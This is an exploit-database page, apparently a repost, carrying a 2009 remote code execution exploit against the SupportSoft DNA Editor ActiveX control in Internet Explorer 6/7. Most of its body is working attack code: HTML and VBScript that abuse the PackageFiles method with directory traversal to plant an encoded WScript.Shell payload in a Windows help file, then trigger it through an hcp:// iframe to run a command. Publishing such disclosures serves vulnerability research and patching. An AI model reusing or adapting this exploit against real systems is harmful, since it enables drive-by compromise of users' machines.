SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) RCE expl

2009-03-05 / 2009-03-06
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7) by Nine:Situations:Group::bruiser vendor url: http://www.supportsoft.com/ our site: http://retrogod.altervista.org/ details: CLSID: {01110800-3E00-11D2-8470-0060089874ED} Progid: Tioga.Editor.1 Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll KillBitted: False Implements IObjectSafety: True Safe For Initialization (IObjectSafety): True Safe For Scripting (IObjectSafety): True vulnerabilities, discovered two months ago: insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one) SaveDna() - remote file creation, directory traversal AddFile() - remote cpu consumption SetIdentity() - remote file creation This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability, see: http://secunia.com/advisories/24246/ My download url was: http://www.supportsoft.com/support/controls_update.asp actually unreachable see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded Well, they probably patched my marking them unsafe for initialization (I see that the ScriptRunner module suffers of a buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control... --> <HTML> <OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' /> </OBJECT> <SCRIPT language='VBScript'> <!-- sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>" 'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm" 'launch the script and calc.exe trough the Help and Support Center Service document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">") --> </SCRIPT> original url: http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html

References:

http://seclists.org/bugtraq/2009/Mar/0038.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top